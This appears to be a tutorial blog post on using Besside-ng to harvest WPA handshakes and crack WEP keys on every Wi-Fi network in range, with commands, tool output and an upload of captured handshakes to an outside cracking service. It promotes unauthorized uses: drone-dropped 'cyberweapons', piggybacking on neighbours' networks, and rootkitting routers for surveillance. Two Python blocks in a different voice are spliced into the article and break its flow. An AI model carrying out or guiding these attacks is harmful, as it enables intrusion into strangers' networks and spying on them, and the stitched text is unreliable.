Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special dependencies and can be run via SSH, making it easy to deploy remotely.
In my opinion, it's one of the most powerful Wi-Fi hacking tools currently available. First written in 2010 in C, Besside-ng is an incredibly aggressive and persistent WPA handshake mass-harvester and WEP cracker. It features customizable options to upload handshakes to distributed WPA password crackers, which automatically crack, on average, over 18% of the networks submitted.
Sound Simple? Let's Look at How It Works
Encrypted Wi-Fi networks come in two primary flavors, WEP and WPA.
While WEP can be broken easily, WPA and WPA2 networks require us to record a "handshake" when a device connects to the target network. Then, we try to guess the password by having a program try many possible passwords against that recorded handshake. If we guess the correct password, we'll know, so having a good password list and a fast processor used to be essential to cracking WPA networks.
In 2020, we have more options. To save time, we can submit these handshakes to a distributed cracking service or a more powerful machine, which will automatically try all of the world's most common and shitty passwords for us. Since many people choose bad passwords, around 10–20% of the networks whose handshakes we recorded will come back with cracked passwords.
To record a precious handshake from a Wi-Fi network, an authorized device like the target's smartphone or laptop must connect to the network. Besside-ng scans the airwaves for any devices connected to a Wi-Fi network, then injects a packet that disconnects the device from that network for a brief moment.
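The cost of "trying many possible passwords against a recorded handshake" comes from the way WPA/WPA2-Personal turns a passphrase into a key. The block below is an added example (not code from the article or from Aircrack-ng) of that derivation: IEEE 802.11i defines the Pairwise Master Key as PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, for 4096 iterations. An offline guesser has to redo that work for every candidate, and because the SSID is the salt, precomputed tables (the airolib-ng databases mentioned in the man page) only help for the specific SSID they were built for. The wordlist, SSID and passphrase are constructed; the "password"/"IEEE" pair is the standard's own test vector. A real cracker checks each guess against the handshake's MIC rather than against a bare PMK, which this example omits; the per-guess PBKDF2 work is the same.

```python
import hashlib
import hmac

# Added example, not code from the article or from Aircrack-ng.
# IEEE 802.11i derives the WPA/WPA2-Personal Pairwise Master Key as
#   PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, iterations=4096, dklen=32)
# Every offline guess against a recorded handshake must recompute this,
# so wpa2_pmk() is the cost of exactly one guess.


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte PMK for a passphrase/SSID pair."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def find_passphrase(candidates, ssid: str, target_pmk: bytes):
    """Try each candidate against a known PMK; return the match or None.

    A real cracker compares a MIC computed from the handshake instead of the
    PMK itself, but the PBKDF2 work per guess shown here is identical.
    """
    for guess in candidates:
        if hmac.compare_digest(wpa2_pmk(guess, ssid), target_pmk):
            return guess
    return None


def ssid_changes_pmk(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs on two SSIDs.

    This is why precomputation (airolib-ng) must be done per SSID and why an
    unusual SSID blunts precomputed tables for common passphrases.
    """
    return wpa2_pmk(passphrase, ssid_a) != wpa2_pmk(passphrase, ssid_b)


# Constructed demo data: a weak passphrase on the 802.11i test-vector SSID.
DEMO_SSID = "IEEE"
DEMO_PASSPHRASE = "password"
DEMO_PMK = wpa2_pmk(DEMO_PASSPHRASE, DEMO_SSID)

# Constructed mini wordlist, the kind of list a "common passwords" service tries first.
DEMO_WORDLIST = ["123456", "qwerty", "letmein", "password", "iloveyou"]

if __name__ == "__main__":
    print("PMK:", DEMO_PMK.hex())
    print("Recovered passphrase:", find_passphrase(DEMO_WORDLIST, DEMO_SSID, DEMO_PMK))
    print("SSID acts as salt:", ssid_changes_pmk("password", "IEEE", "ieee"))
```

The 4096-iteration loop is what made "a fast processor" essential in the pre-cloud days; a distributed service simply spends that work on someone else's hardware. The defensive lesson is the mirror image: the work per guess is fixed, so only the size of the space the guesser has to search (a long, random passphrase) and the uniqueness of the salt (a non-default SSID) change the outcome.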
The targeted device will reconnect automatically, and we will record the handshake when it does. It's terrifyingly easy, and during peak activity hours in a high-density area, Besside-ng can harvest every Wi-Fi network in use within the range of your antenna. Keep in mind, if your target has an always-connected smart device, you can pretty much always grab a handshake for their network.
Why a 2010 Tool Is Still Powerful in 2020
Since 2010, some significant changes have made Besside-ng relevant again. Small, cheap computers like the Raspberry Pi Zero W and the Raspberry Pi 3 can take powerful external network adapters in addition to their internal Wi-Fi card, all while keeping the cost of a remote headless attack suite below $70.
So what kind of applications can we use Besside-ng for? Well, lots. But let's just go over a few of the best use-cases quickly so you get an idea.
1. Cheap Cyberweapons
Cheap, "fire-and-forget" cyberweapons, designed to harvest and crack WPA networks in a given area and then be discarded, are small and light enough to be left in an Altoids tin in the trash, dropped by a small drone on a roof, or tossed over a fence by hand. The same devices can also be used to deliberately jam or attempt to exploit the router of any nearby Wi-Fi network with a bad password.
An attacker would only need a directional antenna (like this one) aimed at the rogue device to communicate with and control it. The rapid way in which Besside-ng builds a list of available Wi-Fi connections to switch between allows a rogue device to develop a "beachhead" into the neighboring wireless environment. This doubles as a list of exploitable routers to pivot through once the WPA password is cracked. Once a rogue device is in place and cracks a few reliable networks, the hacker is free to go home and control the device via a reverse shell.
2. Anonymous Internet That Piggybacks Nearby Networks
Emergency setup of workstations when rapidly shifting locations can be aided by using Besside-ng to acquire several connection options in under an hour. A small team needing to rapidly set up an internet-connected forward operating position in an opportunistic workspace (like working out of a garage or public space) can piggyback off existing nearby infrastructure to reduce its footprint.
While it's easy to get access, it is critical to use Tor or VPNs properly, and spin the MAC address of any devices used each time they connect to such a network. If you need a network — any network — to get working, this is your program. This technique can also be used to quickly set up an environment for rogue devices to operate in, allow for a LAN dead drop between two users over a privately owned network, or impersonate users of nearby networks to mask activity.
3. Electronic Surveillance Through Router Rootkitting
Setups using Kismet drones or other "flytrap-like" methods of electronic surveillance are a great way to avoid having to drop an evil Pi from a drone — or even be anywhere near your target after the initial exploit.
The opportunistic nature of Besside-ng allows it to build up a steady list of routers for a hacker to attempt to exploit. Once a router is successfully compromised, custom router firmware can convert a nearby neighbor's router into a device to spy on a third party's Wi-Fi usage or forward interesting packets. Criminal hackers even leave behind VPN endpoints in exploited routers to provide cover for committing crimes, framing the target, or charging other criminals to use the VPN network.
An Operation with Besside-ng
To show off some of the techniques above, we'll go over an applied scenario of using Besside-ng, but you can follow along on any Kali Linux device or virtual machine.
Our training mission will be to provide Wi-Fi coverage to support an operation in a targeted building. Doing so allows the placement and operation of a small improvised rogue device called a Buck-Eye, a Kali-based Wi-Fi-connected surveillance camera running on a Raspberry Pi Zero W.
Placing a device like this allows us to do useful things like conduct visual and electronic surveillance of an area, extend VoIP coverage to places where cellular coverage may be blocked, pivot deeper into targeted systems, and perform other helpful functions.
To be controlled, the device must be connected to a Wi-Fi network. After it's placed, you can control it from your long-range connection until you can migrate it to a nearby cracked network. We'll be running Besside-ng via SSH on the Buck-Eye once it is placed to grab a nearby network password.
Since our Buck-Eye runs Kali Linux, Besside-ng can ensure tactical network availability by scanning for and helping to build a list of backdoor Wi-Fi connections to spider through to ensure survivability in the event a primary Wi-Fi connection goes down.
What You'll Need to Get Started
Besside-ng runs on Kali Linux and is particularly effective on the Raspberry Pi 3 or Pi Zero W. You'll need the Aircrack-ng suite to run the attack, and your Kali system should be updated by running apt update.
I'll be using a Raspberry Pi running Kali Linux. But the tool will work on any Kali Linux system — here are a few builds we recommend:
- On a Raspberry Pi 3 running Kali Linux, directly or via SSH.
- On a Raspberry Pi Zero W running Kali Linux.
- On a virtual machine running Kali Linux.
- On a live USB or another temporary install of Kali Linux.
Our Kali Linux build is the easiest way to get started. For hardware, the only real requirement is a wireless network adapter capable of packet injection. (It should be noted that our testing has found bugs when using the Atheros AR9271 chipset.)
Step 1: Verify You Have the Aircrack-ng Suite
In our demonstration, I will be connected to our Raspberry Pi build running Kali Linux via SSH, but this will work the same on any Kali install. First, let's make sure we have the Aircrack-ng suite updated. Type man aircrack-ng to check if it already exists on the system.
~$ man aircrack-ng
AIRCRACK-NG(1) General Commands Manual AIRCRACK-NG(1)
NAME
aircrack-ng - a 802.11 WEP / WPA-PSK key cracker
SYNOPSIS
aircrack-ng [options] <input file(s)>
DESCRIPTION
aircrack-ng is an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2
key cracking program.
It can recover the WEP key once enough encrypted packets have been
captured with airodump-ng. This part of the aircrack-ng suite de‐
termines the WEP key using two fundamental methods. The first
method is via the PTW approach (Pyshkin, Tews, Weinmann). The main
advantage of the PTW approach is that very few data packets are
required to crack the WEP key. The second method is the FMS/KoreK
method. The FMS/KoreK method incorporates various statistical at‐
tacks to discover the WEP key and uses these in combination with
brute forcing.
Additionally, the program offers a dictionary method for determin‐
ing the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist
(file or stdin) or an airolib-ng has to be used.
INPUT FILES
Capture files (.cap, .pcap), IVS (.ivs) or Hashcat HCCAPX files
(.hccapx)
OPTIONS
Common options:
-a <amode>
Force the attack mode: 1 or wep for WEP (802.11) and 2 or
wpa for WPA/WPA2 PSK (802.11i and 802.11w).
-e <essid>
Select the target network based on the ESSID. This option
is also required for WPA cracking if the SSID is cloaked.
For SSID containing special characters, see
https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spa‐
ces_double_quote_and_single_quote_etc_in_ap_names
-b <bssid> or --bssid <bssid>
Select the target network based on the access point MAC ad‐
dress.
-p <nbcpu>
Set this option to the number of CPUs to use (only avail‐
able on SMP systems) for cracking the key/passphrase. By
default, it uses all available CPUs
-q If set, no status information is displayed.
-C <macs> or --combine <macs>
Merges all those APs MAC (separated by a comma) into a vir‐
tual one.
-l <file>
Write the key into a file. Overwrites the file if it al‐
ready exists.
Static WEP cracking options:
-c Search alpha-numeric characters only.
-t Search binary coded decimal characters only.
-h Search the numeric key for Fritz!BOX
-d <mask> or --debug <mask>
Specify mask of the key. For example: A1:XX:CF
-m <maddr>
Only keep the IVs coming from packets that match this MAC
address. Alternatively, use -m ff:ff:ff:ff:ff:ff to use all
and every IVs, regardless of the network (this disables ES‐
SID and BSSID filtering).
-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for
104-bit WEP, etc., until 512 bits of length. The default
value is 128.
-i <index>
Only keep the IVs that have this key index (1 to 4). The
default behavior is to ignore the key index in the packet,
and use the IV regardless.
-f <fudge>
By default, this parameter is set to 2. Use a higher value
to increase the bruteforce level: cracking will take more
time, but with a higher likelihood of success.
-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a
huge false positive that prevents the key from being found,
even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable
each attack selectively.
-x or -x0
Disable last keybytes bruteforce (not advised).
-x1 Enable last keybyte bruteforcing (default)
-x2 Enable last two keybytes bruteforcing.
-X Disable bruteforce multithreading (SMP only).
-s Shows ASCII version of the key at the right of the screen.
-y This is an experimental single brute-force attack which
should only be used when the standard attack mode fails
with more than one million IVs.
-z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Wein‐
mann) attack (default attack).
-P <num> or --ptw-debug <num>
PTW debug: 1 Disable klein, 2 PTW.
-K Use KoreK attacks instead of PTW.
-D or --wep-decloak
WEP decloak mode.
-1 or --oneshot
Run only 1 try to crack key with PTW.
-M <num>
-V or --visual-inspection
Run in visual inspection mode. Can only be used when using
KoreK.
WEP and WPA-PSK cracking options
-w <words>
Path to a dictionary file for wpa cracking. Separate file‐
names with comma when using multiple dictionaries. Specify
"-" to use stdin. Here is a list of wordlists:
https://www.aircrack-
ng.org/doku.php?id=faq#where_can_i_find_good_wordlists In
order to use a dictionary with hexadecimal values, prefix
the dictionary with "h:". Each byte in each key must be
separated by ':'. When using with WEP, key length should be
specified using -n.
-N <file> or --new-session <file>
Create a new cracking session. It allows one to interrupt
cracking session and restart at a later time (using -R or
--restore-session). Status files are saved every 5 minutes.
It does not overwrite existing session file.
-R <file> or --restore-session <file>
Restore and continue a previously saved cracking session.
This parameter is to be used alone, no other parameter
should be specified when starting aircrack-ng (all the re‐
quired information is in the session file).
WPA-PSK options:
-E <file>
Create Elcomsoft Wireless Security Auditor (EWSA) Project
file v3.02.
-j <file>
Create Hashcat v3.6+ Capture file (HCCAPX).
-J <file>
Create Hashcat Capture file (HCCAP).
-S WPA cracking speed test.
-Z <sec>
WPA cracking speed test execution length in seconds.
-r <database>
Path to the airolib-ng database. Cannot be used with '-w'.
SIMD selection:
--simd=<option>
Aircrack-ng automatically loads and uses the fastest opti‐
mization based on instructions available for your CPU. This
options allows one to force another optimization. Choices
depend on the CPU and the following are all the possibili‐
ties that may be compiled regardless of the CPU type:
generic, sse2, avx, avx2, avx512, neon, asimd, altivec,
power8.
--simd-list
Shows a list of the available SIMD architectures, separated
by a space character. Aircrack-ng automatically selects the
fastest optimization and thus it is rarely needed to use
this option. Use case would be for testing purposes or when
a "lower" optimization, such as "generic", is faster than
the automatically selected one. Before forcing a SIMD ar‐
chitecture, verify that the instruction is supported by
your CPU, using -u.
Other options:
-H or --help
Show help screen
-u or --cpu-detect
Provide information on the number of CPUs and SIMD support
AUTHOR
This manual page was written by Adam Cecile <gandalf@le-vert.net>
for the Debian system (but may be used by others). Permission is
granted to copy, distribute and/or modify this document under the
terms of the GNU General Public License, Version 2 or any later
version published by the Free Software Foundation On Debian sys‐
tems, the complete text of the GNU General Public License can be
found in /usr/share/common-licenses/GPL.
SEE ALSO
airbase-ng(8)
aireplay-ng(8)
airmon-ng(8)
airodump-ng(8)
airodump-ng-oui-update(8)
airserv-ng(8)
airtun-ng(8)
besside-ng(8)
easside-ng(8)
tkiptun-ng(8)
wesside-ng(8)
airdecap-ng(1)
airdecloak-ng(1)
airolib-ng(1)
besside-ng-crawler(1)
buddy-ng(1)
ivstools(1)
kstats(1)
makeivs-ng(1)
packetforge-ng(1)
wpaclean(1)
airventriloquist(8)
Version 1.6.0 January 2020 AIRCRACK-NG(1)
If not, or if we want to make sure it's updated, let's run the following command.
~$ sudo apt install aircrack-ng
Reading package lists... Done
Building dependency tree
Reading state information... Done
aircrack-ng is already the newest version (1:1.6-4).
aircrack-ng set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Once we confirm we have the suite and it's updated, we can proceed with the attack.
Step 2: Identify Your Attack Antenna & Let It Rip
On Kali Linux, you can type iwconfig to see a list of available antennas. If you are connecting to your Kali Linux device remotely via SSH or VNC, now is a great time to note which antenna is hosting your data connection (the one with the IP address assigned).
Starting Besside-ng on the wrong antenna will instantly sever your remote connection and, if you are connected via SSH, lock you out of the device until you restart it. Here we see my attack antenna is idle while my command and control antenna is attached to a network.
~$ sudo iwconfig
wlan0 IEEE 802.11bgn ESSID:"████████████████████"
Mode:Managed Frequency:2.462 GHz Access Point: ████████████████████
Bit Rate=72 Mb/s Tx-Power=1496 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=60/70 Signal level=50 dBm
Rx invalid nvid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
lo no wireless extensions.
eth0 no wireless extensions.
wlan1 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=1496 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
If you are not on Kali, you can run ifconfig to see attached antennas and look for "wlan" to spot the wireless antennas. In this case, wlan1 is my attack antenna.
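Picking the wrong interface is the one mistake in this step that costs you the session, so it is worth scripting the check rather than eyeballing it. The block below is an added example (not code from the article or from Aircrack-ng) that parses iwconfig-style output and separates the wireless interface that is currently associated with an access point (the one carrying your SSH or VNC session) from the idle ones that are safe to hand to Besside-ng. The sample output is constructed to match the layout shown above; the interface names, ESSID and MAC address in it are placeholders. On a live system you would feed it the result of running iwconfig instead of the constant.

```python
import re
import subprocess

# Constructed sample modelled on the iwconfig output shown in the article.
# Interface names, ESSID and addresses are placeholders, not values from the page.
SAMPLE_IWCONFIG = """\
wlan0     IEEE 802.11bgn  ESSID:"LabNet"
          Mode:Managed  Frequency:2.462 GHz  Access Point: 02:00:00:00:00:01
          Bit Rate=72 Mb/s   Tx-Power=20 dBm
          Link Quality=60/70  Signal level=-50 dBm

lo        no wireless extensions.

eth0      no wireless extensions.

wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Power Management:off
"""


def parse_iwconfig(text: str) -> dict:
    """Map each interface name to {wireless, essid, associated}.

    iwconfig prints the interface name flush-left and indents the rest of
    that interface's details; an interface with an Access Point other than
    'Not-Associated' is currently attached to a network.
    """
    result = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            name, _, rest = line.partition(" ")
            current = name
            result[current] = {
                "wireless": "no wireless extensions" not in rest,
                "essid": None,
                "associated": False,
            }
            match = re.search(r'ESSID:"([^"]*)"', rest)
            if match:
                result[current]["essid"] = match.group(1)
            continue
        if current and "Access Point:" in line and "Not-Associated" not in line:
            result[current]["associated"] = True
    return result


def management_interfaces(text: str) -> list:
    """Wireless interfaces attached to a network: do NOT give these to Besside-ng."""
    info = parse_iwconfig(text)
    return sorted(n for n, v in info.items() if v["wireless"] and v["associated"])


def idle_wireless_interfaces(text: str) -> list:
    """Wireless interfaces not attached to anything: candidates for the attack antenna."""
    info = parse_iwconfig(text)
    return sorted(n for n, v in info.items() if v["wireless"] and not v["associated"])


def live_iwconfig() -> str:
    """Run iwconfig on the local host (used only when invoked as a script)."""
    return subprocess.run(["iwconfig"], capture_output=True, text=True).stdout


if __name__ == "__main__":
    text = SAMPLE_IWCONFIG  # swap for live_iwconfig() on a real box
    print("keep (carries your remote session):", management_interfaces(text))
    print("idle (safe to use for the attack):", idle_wireless_interfaces(text))
```

The parser only relies on two stable features of iwconfig's layout (the flush-left interface name and the "Access Point:" field), so it survives the variation in the other fields between drivers. If the idle list is empty, there is no spare adapter and starting Besside-ng will take down the link you are typing over.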
Step 3: Configure Your Attack & Let's Ride
Besside-ng is dead simple. To learn more about it, visit its man page.
~$ man besside-ng
BESSIDE-NG(8) System Manager's Manual BESSIDE-NG(8)
NAME
besside-ng - crack a WEP or WPA key without user intervention and
collaborate with WPA cracking statistics
SYNOPSIS
besside-ng [options] <interface>
DESCRIPTION
besside-ng is a tool which will crack all the WEP networks in
range and log all the WPA handshakes. WPA handshakes can be up‐
loaded to the online cracking service at wpa.darkircop.org.
Wpa.darkircop.com also provides useful statistics based on user-
submitted capture files about the feasibility of WPA cracking.
-b <target mac>
Specifies the target's BSSID
-s <WPA server>
Where to upload capture file for cracking. A good choice is
wpa.darkircop.org
-c <chan>
Channel lock
-p <pps>
Packages per second to send (flood rate).
-W Crack only WPA networks
-v Verbose mode. Use -vv for more verbose, -vv for even more
and so on.
-h Help screen
AUTHOR
This manual page was written by David Francos Cuartero. Permis‐
sion is granted to copy, distribute and/or modify this document
under the terms of the GNU General Public License, Version 2 or
any later version published by the Free Software Foundation On De‐
bian systems, the complete text of the GNU General Public License
can be found in /usr/share/common-licenses/GPL.
SEE ALSO
airbase-ng(8)
aireplay-ng(8)
airmon-ng(8)
airodump-ng(8)
airodump-ng-oui-update(8)
airserv-ng(8)
airtun-ng(8)
easside-ng(8)
tkiptun-ng(8)
wesside-ng(8)
aircrack-ng(1)
airdecap-ng(1)
airdecloak-ng(1)
airolib-ng(1)
besside-ng-crawler(1)
buddy-ng(1)
ivstools(1)
kstats(1)
makeivs-ng(1)
packetforge-ng(1)
wpaclean(1)
airventriloquist(8)
Version 1.6.0 January 2020 BESSIDE-NG(8)
With the attack antenna known as wlan1, simply type the following command to initiate a wide-area attack against all detected APs. While it helps to put an adapter in monitor mode, Besside-ng will take care of that.
~$ sudo besside-ng wlan1 -vv
[10:07:47] mac ██:██:██:██:██:██
[10:07:47] Let's ride
[10:07:47] Resuming from besside-ng
[10:07:47] Found AP ████████████████ [██████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [██████████████] chan 0 crypto WPA dbm 0
[10:07:47] Appending to wpa.cap
[10:07:47] Appemding to wep.cap
[10:07:47] Logging to besside.log
[10:07:47] Found AP ████████████████ [██████] chan 1 crypto WPA dbm -01
[10:07:47] Found AP ████████████████ [██████] chan 2 crypto WPA dbm -04
[10:07:47] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -06
[10:07:47] Found AP ████████████████ [██████████████████] chan 1 crypto WPA dbm -00
[10:07:48] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -56
[10:07:48] Found AP ████████████████ [██████████] chan 4 crypto WPA dbm -79
[10:07:49] Found AP ████████████████ [████████████] chan 7 crypto WPA dbm -50
[10:07:50] Found AP ████████████████ [████] chan 9 crypto WPA dbm -49
[10:07:50] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -83
[10:07:51] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -72
[10:07:51] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -59
[10:07:52] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -63
[10:07:52] Found AP ████████████████ [████] chan 4 crypto WPA dbm -53
[10:07:53] Found AP ████████████████ [████████████████] chan 6 crypto WPA dbm -65
[10:07:53] Found AP ████████████████ [██████████████████████] chan 7 crypto WPA dbm -66
[10:07:54] - Scanning chan 11
Shit will proceed to hit the fan, with the script automatically throwing the wireless card into monitor mode and scanning all channels for targets. On the first run or two, you may get a "no child process" error. Just run the sudo besside-ng wlan1 command again, and it will start. To see everything the script is doing, add the -vv argument at the end. You'll see the blistering speed at which Besside-ng finds, prioritizes, pings, and attacks networks.
Step 4: Clarify the Operation During Attack Runs
In a target-rich environment, Besside-ng will run continuously for days or weeks; my current endurance record is over one week of continuous attacking. While the attack runs, it will prioritize WEP networks as they can be wholly compromised from within the script. As such, Besside-ng may focus too heavily on WEP and slow down the attack. You can prevent this by only attacking WPA networks by adding the -W argument to the command, as the help page suggests.
~$ sudo besside-ng -h
Besside-ng 1.6 - (C) 2010 Andrea Bittau
https://www.aircrack-ng.org
Usage: besside-ng [options] <interface>
Options:
-b <victim mac> : Victim BSSID
-R <victim ap regex> : Victim ESSID regex
-s <WPA server> : Upload wpa.cap for cracking
-c <chan> : chanlock
-p <pps> : flood rate
-W : WPA only
-v : verbose, -vv for more, etc.
-h : This help screen
This script will, by default, scan all channels, which makes it too slow for wardriving (see null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/) to capture handshakes since, by the time the master list of APs to attack is built and prioritized, you're a block away.
This can be mitigated in part by adding the -c argument followed by a channel number to stay locked on. Doing so builds the target list much more quickly, at the expense of only attacking one channel. Run Airodump-ng to determine the best channels to lock to.
If you wish to attack a particular network, you can add the -b argument followed by the BSSID of the target to specify which access point you want to attack. This is useful for networks with many APs under the same name (extended service sets), which may have many identically named APs that all appear as the same Wi-Fi network. Adding this argument allows you to focus your attack on a particular AP under the umbrella of the network and make faster progress on cracking a WEP key.
Step 5: Auto-Crack Passwords from WPA.cap During an Attack
Soon, you will begin to gather WPA handshakes, potentially a lot of them. They will be automatically appended to the wpa.cap file, which is created in your home directory if it doesn't already exist. WEP packets are similarly saved to a file called wep.cap; either file can be run through Aircrack-ng to attempt to recover the password.
[10:52:55] Crappy connection - ████████ unreachable got 0/10 (100% loss) [-85 dbm]
[10:53:12] Got necessary WFA handshake info for ████████
[10:53:12] Uploaded WPA handshake to wpa.darkircop.org
[10:53:12] Pwned network ████████ in 0:07 mins:secs
[10:53:12] TO-OWN [████████ ████████████████ ████████ ████ ████████████████████]
We can run these in Aircrack-ng against our own password list, but electricity is expensive, and brute-force attacks are very dull. Instead, we can use the -s argument to specify a WPA server to upload the handshakes to. This will let a distributed service like wpa.darkircop.org crack the passwords for us.
Step 6: Auto-Crack Passwords from WEP.cap During an Attack
If Besside-ng detects a WEP network in range, it will cyberbully the hell out of it. You can open a second terminal window and begin attacking a WEP network while Besside-ng collects the unique IVs Aircrack-ng needs to crack the network.
In a terminal, run the following; Aircrack-ng will display a list of every network captured by Besside-ng so you can select the one to attack.
~$ sudo aircrack-ng ./wep.cap
Opening /Users/████████/web.cap
Read 75862 packets.
# BSSID ESSID Encryption
1 ████████████████ ████████████████ WEP (28122 IVs)
2 ████████████████ WEP (1012 IVs)
3 ████████████████ WPA (0 handshake)
4 ████████████████ WEP (108 IVs)
5 ████████████████ WEP (4 IVs)
6 ████████████████ WPA (0 handshake)
7 ████████████████ WPA (0 handshake)
8 ████████████████ WEP (7 IVs)
9 ████████████████ WPA (0 handshake)
10 ████████████████ WEP (7 IVs)
11 ████████████████ WPA (0 handshake)
12 ████████████████ WEP (6 IVs)
13 ████████████████ ██████████████ WEP (6 IVs)
14 ████████████████ WEP (13 IVs)
15 ████████████████ ███████████████ WEP (19984 IVs)
16 ████████████████ WEP (22 IVs)
17 ████████████████ ████████████████ WEP (44 IVs)
18 ████████████████ ████████████ WEP (20240 IVs)
19 ████████████████ WEP (12 IVs)
20 ████████████████ ████████ WEP (1 IVs)
21 ████████████████ WEP (1 IVs)
22 ████████████████ ████████ WEP (749 IVs)
23 ████████████████ ████████ WEP (105 IVs)
24 ████████████████ ████████ WEP (1 IVs)
25 ████████████████ ████████████████ WEP (1578 IVs)
26 ████████████████ WEP (9 IVs)
27 ████████████████ ███████████████████ WEP (7 IVs)
28 ████████████████ ██████████████████ WEP (1 IVs)
29 ████████████████ ██████████████ WEP (2 IVs)
30 ████████████████ ████████████████ WEP (3 IVs)
31 ████████████████ ████████ WEP (3052 IVs)
32 ████████████████ ██████ WEP (4 IVs)
Index number of target networks ?
Select the number of the network Besside-ng will target, and a beautiful symphony of math ensues as Aircrack-ng attacks the encryption.
Index number of target networks ? 18
Aircrack-ng 1.2 rc4
[00:00:07] Tested 794881 keys (got 25521 IVs)
KB depth byte(vote)
0 0/ 1 21(38912) AC(34560) 5B(32768) 1F(31744) C8(31744) 0D(30976) 63(30976) 8C(30976) 82(30720) 09(30464) 69(30464) A0(30464) FC(30464)
1 2/ 3 78(32000) F5(31744) FE(30976) 06(30464) 3E(30464) 9F(30464) AC(30464) C6(30464) D2(30464) 38(30208) 43(30208) 4D(30208) 1C(22952)
2 0/ 1 FB(36352) 33(32768) 0F(32256) 37(31744) 2D(30976) DA(30720) 0D(30208) 61(30208) 9E(30208) AD(30208) C5(30208) F9(30208) 45(29952)
3 1/ 2 4D(34304) A0(32512) 18(31744) 81(30406) C7(30464) F9(30464) 87(30208) 99(30208) A6(30208) D1(30208) F1(30208) 2B(29952) 5B(29952)
4 1/ 2 37(34304) EB(32256) C5(31488) AA(30720) EE(30208) FA(30208) 4A(29952) B3(29952) A7(29696) 61(29440) D0(29184) DB(21184) ED(28928)
5 5/ 6 D4(31488) 8F(30976) EE(30720) 3C(30208) 7D(30208) C4(30208) 77(29952) B8(29952) 5A(29696) B3(29440) 1C(29184) 61(29184) 82(29184)
6 3/ 4 D5(31488) 96(30976) 2B(30208) 90(30208) 6B(30464) AB(30464) CE(30208) F0(30208) FE(30208) 1D(29696) 33(29696) 39(29696) B8(29696)
7 14/ 15 F6(30208) C3(29952) E0(29952) 4A(29696) AF(29696) 32(29440) 50(29440) 31(29184) 7A(29184) B6(29184) BE(29184) EE(29184) 2E(28928)
8 3/ 4 70(30976) 6B(30720) 47(30464) DF(30464) 1F(30208) 32(30208) 7F(30208) 9F(30208) B7(30208) 9C(29696) BF(29696) C3(29696) FF(26969)
9 0/ 1 AB(33536) 1F(31488) 23(31488) C6(31488) 6D(31232) BD(31232) D8(31232) 63(30976) 60(30720) 16(30464) 59(30464) A5(30208) 05(29952)
10 4/ 8 19(31232) 39(30976) E4(30976) FA(30976) 0F(30464) 44(30464) D3(30464) A2(30208) A6(29952) 09(29696) 25(29696) 50(29696) 54(29696)
11 2/ 3 C7(32000) E5(30976) 45(30464) 87(30464) F7(30464) E9(30208) 0B(29952) 41(29952) AD(29952) 31(29696) 42(29696) 9A(29696) D9(29696)
12 1/ 2 37(32256) FD(31744) 8E(31232) E7(30720) FA(30720) 68(30464) D1(30208) 45(29952) 4F(29952) 5D(29952) 65(29952) 09(29696) 39(29696)
Aircrack-ng will re-try the attack automatically every 5,000 IVs as more packets are captured by Besside-ng.
KB depth byte(vote)
0 7/ 8 99(5120) D4(4864) 00(4864) 8B(4864) 07(4864) FB(4864) 11(4864) 03(4608) EC(4608) 17(4608) 18(4608) E6(4608) D9(4608)
1 10/ 14 B2(4864) 6D(4608) 99(4608) 05(4608) A9(4352) 91(4352) 95(4352) B4(4352) 1B(4352) A7(4352) DC(4096) 1D(4096) FC(4096)
2 14/ 15 2D(4608) D6(4352) BD(4352) CF(4352) 0D(4352) 10(4352) 86(4352) B2(4352) B1(4352) FF(4352) 79(4096) D4(4096) 03(4096)
3 15/ 3 07(4352) 4E(4352) DB(4352) 09(4352) 58(4352) 6D(4096) 25(4096) 0F(4096) 44(4096) 8B(4096) 15(4096) 85(4096) EA(4096)
4 17/ 4 95(4352) 72(4352) CC(4352) 55(4352) C2(4096) 19(4096) 2D(4096) 2F(4096) 33(4096) FF(4096) 05(4096) 07(4096) F2(4096)
Failed. Next try with 5000 IVs.
This repeats until we defeat the encryption and gain the key.
KB depth byte(vote)
0 0/ 15 21(26112) E1(25600) F9(25088) B9(24832) BA(24576) A2(24320) 19(24320) 10(24064) 63(23808) DA(23552) 8C(23552) BD(23552) ED(23552)
